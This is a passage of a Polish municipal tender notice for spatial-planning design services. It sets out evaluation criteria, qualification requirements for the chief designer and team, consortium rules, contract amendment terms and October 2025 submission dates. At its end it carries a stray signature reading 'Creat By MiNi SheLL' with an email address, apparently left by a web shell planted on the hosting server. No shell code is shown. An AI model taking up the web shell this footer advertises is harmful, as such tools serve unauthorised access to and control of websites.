zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach – pod rygorem odrzucenia takiej oferty.<br/>7.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Głównego Projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu;<br/>2)	spełniają warunki udziału w postępowaniu, określone przez zamawiającego w ogłoszeniu o zamówieniu.<br/>2.	Warunki udziału w postępowaniu ustanowione przez Zamawiającego:<br/>1)	Zdolności do występowania w obrocie gospodarczym:<br/>-	ZAMAWIAJĄCY NIE STAWIA SZCZEGÓŁOWEGO WARUNKU W TYM ZAKRESIE,<br/>2)	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>-	ZAMAWIAJĄCY NIE STAWIA SZCZEGÓŁOWEGO WARUNKU W TYM ZAKRESIE,<br/>3)	Sytuacja ekonomiczna lub finansowa:<br/> - ZAMAWIAJĄCY NIE STAWIA SZCZEGÓŁOWEGO WARUNKU W TYM ZAKRESIE,<br/>4)	Zdolność techniczna lub zawodowa:<br/>a)	posiadanie niezbędnej wiedzy i doświadczenia, tj.:<br/>-	ZAMAWIAJĄCY ŻĄDA BY WYKONAWCA:<br/>nie wcześniej niż w okresie ostatnich 3 lat, przed upływem terminu składania ofert o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie co najmniej 1 usługę polegającą na opracowaniu:<br/>- min. 150 sztuk dla jednego Zamawiającego (Główny Projektant)<br/>projektów decyzji o warunkach zabudowy i zagospodarowania terenu wraz z analizą obszaru w rozumieniu przepisów ustawy z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2024 r., poz. 1130) oraz rozporządzeń wykonawczych do ustawy. Wykazane usługi powinny być uwierzytelnione stosownymi dowodami określającymi czy te usługi zostały wykonane należycie. Okres wyrażony w latach liczy się od dnia, w którym upływa termin składania ofert oraz dołączy dowody (referencje) określające, czy usługi zostały wykonane lub w przypadku świadczeń okresowych lub ciągłych są wykonywane należycie. <br/><br/>b)	dysponowanie osobami, skierowanymi przez Wykonawcę do realizacji zamówienia<br/>publicznego, tj.:<br/>-	ZAMAWIAJĄCY ŻĄDA BY WYKONAWCA DYSPONOWAŁ:<br/>1.	STANOWISKO: 1 Główny Projektant<br/>UPRAWNIENIA: do projektowania w planowaniu przestrzennym na podstawie: <br/>- ustawy z dnia 27 marca 2003 r o planowaniu i zagospodarowaniu przestrzennym<br/>- ustawy z dnia 12 lipca 1984 r. o planowaniu przestrzennym lub<br/>- ustawy z dnia 7 lipca 1994 r. o zagospodarowaniu przestrzennym lub - ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów<br/>- Wymagane DOŚWIADCZENIE: <br/>wykonanie w okresie ostatnich 3 lat co najmniej 1 usługę polegającą na sporządzeniu minimum:<br/>- 150 sztuk dla jednego Zamawiającego (Główny projektant)<br/>projektów decyzji o warunkach zabudowy i zagospodarowania terenu wraz z analizą obszaru w rozumieniu przepisów ustawy z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2024 r., poz. 1130) oraz rozporządzeń wykonawczych do ustawy. Wykazane usługi powinny być uwierzytelnione stosownymi dowodami określającymi czy te usługi zostały wykonane należycie. Okres wyrażony w latach liczy się od dnia, w którym upływa termin składania ofert.<br/>Dysponuje osobami, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą kwalifikacje do sporządzania projektów decyzji o warunkach zabudowy i zagospodarowania terenu wraz z analizą obszaru w rozumieniu przepisów ustawy z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2024 r., poz. 1130) oraz rozporządzeń wykonawczych do ustawy.<br/><br/>Należy dołączyć dowody (referencje) określające, czy usługi te zostały wykonane lub w przypadku świadczeń okresowych lub ciągłych są wykonywane należycie.<br/><br/>2.	STANOWISKO: Zespół projektowy – składający się z co najmniej 4 osób posiadający:<br/>UPRAWNIENIA do projektowania w planowaniu przestrzennym na podstawie: <br/> - ustawy z dnia 27 marca 2003 r o planowaniu i zagospodarowaniu przestrzennym <br/>- ustawy z dnia 12 lipca 1984 r. o planowaniu przestrzennym, <br/>- lub ustawy z dnia 7 lipca 1994 r. o zagospodarowaniu przestrzennym, - lub ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów;<br/>1.	Posiadają dyplom ukończenia studiów wyższych w zakresie: <br/>- architektury,<br/>- urbanistyki, <br/>- gospodarki przestrzennej;<br/>2.	Posiadają dyplom ukończenia studiów wyższych w innym zakresie oraz ukończyły studia <br/>podyplomowe w zakresie:<br/>- planowania przestrzennego,<br/>- urbanistyki,<br/>- gospodarki przestrzennej;<br/>3.	Są obywatelami państw UE, EFTA lub Konfederacji Szwajcarskiej i posiadają kwalifikacje<br/>zawodowe do projektowania zagospodarowania przestrzeni odpowiadające powyższym <br/>wymaganiom;<br/><br/>c) SPRZĘT: - NIE STAWIA SZCZEGÓŁOWEGO WARUNKU W TYM ZAKRESIE,<br/><br/>UWAGA:<br/>1)	W przypadku, gdy zamówienia o wyżej opisanym zakresie były zrealizowane łącznie z innymi zakresami usług, Wykonawca musi bezwzględnie wykazać wielkość i zakres tylko tych usług, które jako zadanie wymienione wyżej potwierdzają spełnienie warunków udziału w niniejszym postępowaniu.<br/>2)	Zamawiający wymaga, aby nadzór nad realizacją usług objętych przedmiotem zamówienia odbywał się co najmniej przez osobę wykazaną przez Wykonawcę na potwierdzenie spełnienia warunku dysponowania osobami zdolnymi do wykonania zamówienia.<br/>3.	Warunek udziału w postępowaniu dotyczący odpowiednio sytuacji finansowej i/lub kwalifikacji zawodowych i/lub doświadczenia musi być spełniony:<br/>1)	przez Wykonawcę samodzielnie, <br/>2)	przez podmiot udostępniający zasoby;<br/>3)	a w przypadku Wykonawców występujących wspólnie – łącznie przez wykonawców ubiegających się o zamówienie, z zastrzeżeniem: „w odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane”. Celem potwierdzenia Wykonawcy składający ofertę wspólnie są zobowiązani do oferty dołączyć oświadczenie na podstawie art. 117 ust. 4 Pzp – zał. nr 3 do SWZ.<br/>UWAGA: nie jest dopuszczalne łączenie (sumowanie) wymaganego doświadczenia w ramach doświadczenia różnych podmiotów wskazanych w pkt 1-2 lub z różnych przedsięwzięć jednego z podmiotów wyżej wymienionych.<br/>4.	W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia, Wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	w celu potwierdzenia, że Wykonawca nie podlega wykluczeniu (art. 273 ust.1 pkt 1 w zw. art. 108 ust. 1 pkt 5 i art. 109 ust. 1 pkt 4):<br/>a)	oświadczenia Wykonawcy o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej;<br/>b)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej - sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji (jeśli spełnione będą warunki art. 274 ust. 4 Pzp Zamawiający samodzielnie uzyska dokument za pomocą bezpłatnych i ogólnodostępnych baz danych);</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2)	w celu potwierdzenia, że Wykonawca spełnia warunki udziału w postępowaniu (art. 273 ust. 1 pkt 2):<br/>a)	wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty; Wzór oświadczenia stanowi załącznik nr 6 do SWZ;<br/>b)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego; Wzór oświadczenia stanowi załącznik nr 7 do SWZ;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> formularz ofertowy, pełnomocnictwo (jeśli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 18. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (również spółki cywilne):<br/> 1) Wykonawcy ustanawiają pełnomocnika co najmniej do reprezentowania ich w postępowaniu;<br/> 2) treść pełnomocnictwa Wykonawców wspólnie ubiegających się o zamówienie winna:<br/> a) identyfikować wszystkich Wykonawców;<br/> b) wskazywać jakiego postępowania dotyczy;<br/> c) wskazywać ustanowionego pełnomocnika;<br/> d) określać zakres umocowania pełnomocnika;<br/> e) zwierać oświadczenie o przyjęciu wspólnej solidarnej odpowiedzialności za wykonanie lub nienależyte wykonanie<br/> zamówienia;<br/> f) być podpisana przez osoby upoważnione do reprezentowania poszczególnych Wykonawców i w formie oryginału lub w<br/> kopii poświadczonej notarialnie musi znajdować się w ofercie wspólnej Wykonawców; pełnomocnictwo może być udzielone<br/> w szczególności: łącznie przez wszystkich Wykonawców (jeden dokument) albo oddzielnie przez każdego z nich (tyle<br/> dokumentów ilu Wykonawców);<br/> 3) jeśli pełnomocnik Wykonawców udzieli „dalszego pełnomocnictwa”, upoważnienie do wykonania takiej czynności powinno<br/> jasno wynikać z pełnomocnictwa Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/> 4) Wykonawcy solidarnie odpowiadają za podpisanie umowy, wykonanie umowy i wniesienie zabezpieczenia należytego<br/> wykonania umowy;<br/> 5) w ofercie powinien być podany adres do korespondencji i kontakt telefoniczny z pełnomocnikiem; korespondencja<br/> dokonywana będzie wyłącznie z podmiotem występującym jako Pełnomocnik;<br/> 6) poświadczenie dokumentów odbywa się zgodnie z zapisami niniejszej SWZ, oraz stosownych przepisów;<br/> 7) oferta wspólna składana przez dwóch lub więcej Wykonawców winna spełniać niżej wymienione wymagania:<br/> a) formularz oferty i dokumenty podmiotowe składa wyłoniony LIDER (pełnomocnik);<br/> b) dokumenty, dotyczące własnej firmy, takie jak np.: oświadczenie o braku podstaw do <br/>wykluczenia i o spełnianiu warunków udziału w postępowaniu składa każdy z Wykonawców składających ofertę wspólną we<br/> własnym imieniu (powyższe dotyczy również wspólników spółki cywilnej);<br/> c) kopie dokumentów dotyczących każdego z Wykonawców składających ofertę wspólną muszą być poświadczone za<br/> zgodność z oryginałem przez osobę lub osoby upoważnione do reprezentowania tych Wykonawców;<br/> 8) załączone do oferty dokumenty powinny potwierdzać, że osoby podpisujące pełnomocnictwo są uprawnione do składania<br/> oświadczeń woli w imieniu Wykonawcy;<br/> 9) jeżeli oferta Wykonawców wspólnie ubiegających się o uzyskanie zamówienia zostanie wybrana, Wykonawcy składający<br/> ofertę wspólną (zwani dalej konsorcjum) będą mieli obowiązek przedstawić Zamawiającemu umowę regulującą współpracę,<br/> która powinna zawierać:<br/> a) określenie członków konsorcjum;<br/> b) wskazanie celu gospodarczego ustanowienia konsorcjum, w sposób precyzyjny wskazać nazwę inwestycji, jej lokalizację,<br/> określenie inwestora (zamawiającego);<br/> c) określenie udziału stron umowy w realizacji przedmiotu zamówienia;<br/> d) szczegółowy podział prac, który jasno określi punkty styku między konsorcjantami podczas realizacji przedmiotu<br/> zamówienia;<br/> e) określenie lidera Konsorcjum, jego praw i obowiązków;<br/> f) postanowienia dotyczące wygaśnięcia umowy konsorcjum, określenie czasu obowiązywania umowy, który nie może być<br/> krótszy, niż okres obejmujący realizację zamówienia oraz czas trwania gwarancji jakości. Konsorcjum winno być powołane<br/> najpóźniej w dniu upływu terminu składania ofert;<br/> 10) wypełniając formularz oferty jak również inne dokumenty powołujące się na Wykonawcę; w miejscu „np. nazwa i adres<br/> Wykonawcy” należy wpisać dane Wykonawców wspólnie ubiegających się o zamówienie;<br/> 11) wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę wspólną i mają do nich zastosowanie zasady określone w niniejszym ustępie. Spółka cywilna ubiegająca się o zamówienie musi wyznaczyć pełnomocnika do jej reprezentowania. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy, na podstawie art. 454-455 ustawy oraz postanowień Projektu Umowy.<br/>2.	Zamawiający przewiduje możliwość wprowadzenia zmian do umowy na etapie realizacji prac, w szczególności, jeżeli wystąpią następujące przesłanki:<br/>1) Zmiana terminu związanego z wykonaniem umowy w następujących okolicznościach:<br/>a)	wystąpią okoliczności, których strony nie mogły przewidzieć w chwili zawarcia umowy pomimo zachowania należytej staranności, które uniemożliwiają wykonanie przedmiotu umowy w terminie przewidzianym w umowie. <br/>b)	W przypadku stwierdzenia, że okoliczności związane z wystąpieniem COVID 19 mają wpływ na termin zakończenia wykonania umowy lub należyte wykonanie przedmiotu zamówienia<br/>c)	w przypadku zmian prowadzących do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy,<br/>d)	Siła wyższa w rozumieniu umowy uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SWZ.<br/>e)	Zmiana terminu wykonania umowy, jeżeli wystąpią okoliczności, których strony nie mogły przewidzieć w chwili zawarcia umowy pomimo zachowania należytej staranności <br/>3.	Zmiana umowy wymaga zachowania formy pisemnej pod rygorem nieważności.<br/>4.	Wniosek Wykonawcy o zmianę treści umowy winien być zgłoszony Zamawiającemu, w terminie do 7 dni od momentu wystąpienia przesłanek do zmian umowy.<br/>5.	W przypadkach określonych w ust. 1 przedłużenie terminu wykonania przedmiotu umowy może nastąpić o czas niezbędny do jego wykonania, jednak nie dłużej niż okres trwania przeszkody uniemożliwiającej wykonywanie przedmiotu umowy.<br/>6.	Przedłużenie terminu Zamawiający warunkuje złożeniem przez Wykonawcę wniosku <br/>o sporządzenie aneksu do umowy wraz z powołaniem się na podstawę zmiany umowy <br/>i uzasadnieniem wniosku opisującym okoliczności faktyczne. Do wniosku o sporządzenie aneksu do umowy Wykonawca jest zobowiązany przedłożyć również potwierdzone za zgodność z oryginałem kserokopie dokumentów potwierdzających okoliczności faktyczne wskazywane przez Wykonawcę we wniosku. Zamawiający może zażądać od Wykonawcy okazania oryginałów przedstawionych przez Wykonawcę dokumentów.<br/>7.	W okresie gwarancji Wykonawca zobowiązany jest do pisemnego powiadomienia o: <br/>1)	zmianie siedziby lub nazwy firmy,<br/>2)	zmianie osób reprezentujących,<br/>3)	ogłoszeniu upadłości Wykonawcy,<br/>4)	wszczęciu postępowania układowego, w którym uczestniczy Wykonawca,<br/>5)	ogłoszeniu likwidacji,<br/>6)	zawieszeniu działalności.<br/>Wszystkie powyższe postanowienia stanowią katalog zmian, poza zapisami ustawy, które przed wprowadzeniem do umowy wymagają zgodnej akceptacji stron umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/gminazamosc w zakładce dotyczącej odpowiedniego postępowania w myśl Ustawy PZP na stronie internetowej prowadzonego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-06 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com